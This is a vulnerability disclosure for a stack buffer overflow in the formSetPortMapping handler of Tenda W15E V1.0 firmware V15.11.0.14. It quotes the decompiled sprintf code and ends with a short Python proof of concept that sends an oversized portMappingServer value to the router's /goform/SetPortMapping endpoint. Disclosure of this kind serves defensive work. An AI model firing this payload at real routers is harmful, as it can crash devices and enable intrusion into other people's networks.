formSetPortMapping.md

Overview

• Firmware download website: https://www.tendacn.com/download/detail-2722.html

Affected version

W15EV1.0 V15.11.0.14

Vulnerability details

The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formSetPortMapping function. The pPortMapIndex variable receives the portMappingIndex parameter from a POST request and we let iPortMapIndex + 1 <= 20. However, since the user can control the input of portMappingServer, portMappingProtocol, portMappingWan, porMappingtInternal, portMappingExternal, the statement

pLanIP = websGetVar(wp, "portMappingServer", byte_DA130);
pProtocl = websGetVar(wp, "portMappingProtocol", byte_DA130);
pWanid = websGetVar(wp, "portMappingWan", byte_DA130);
pLanPortRange = websGetVar(wp, "porMappingtInternal", byte_DA130);
pWanPortRange = websGetVar(wp, "portMappingExternal", byte_DA130);
sprintf(
      (char *)sMibValue,
      "%s;%s;%s;%s;%s;%d",
      (const char *)pWanid,
      (const char *)pWanPortRange,
      (const char *)pLanPortRange,
      (const char *)pLanIP,
      (const char *)pProtocl,
      1);

can cause a buffer overflow. The user-provided portMappingServer, portMappingProtocol, portMappingWan, porMappingtInternal, portMappingExternal can exceed the capacity of the cmd array, triggering this security vulnerability.

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetPortMapping"
payload = b"a"*2000

data = {
        'portMappingIndex': 1,
    	'portMappingServer':payload,
    }
response = requests.post(url, data=data)
print(response.text)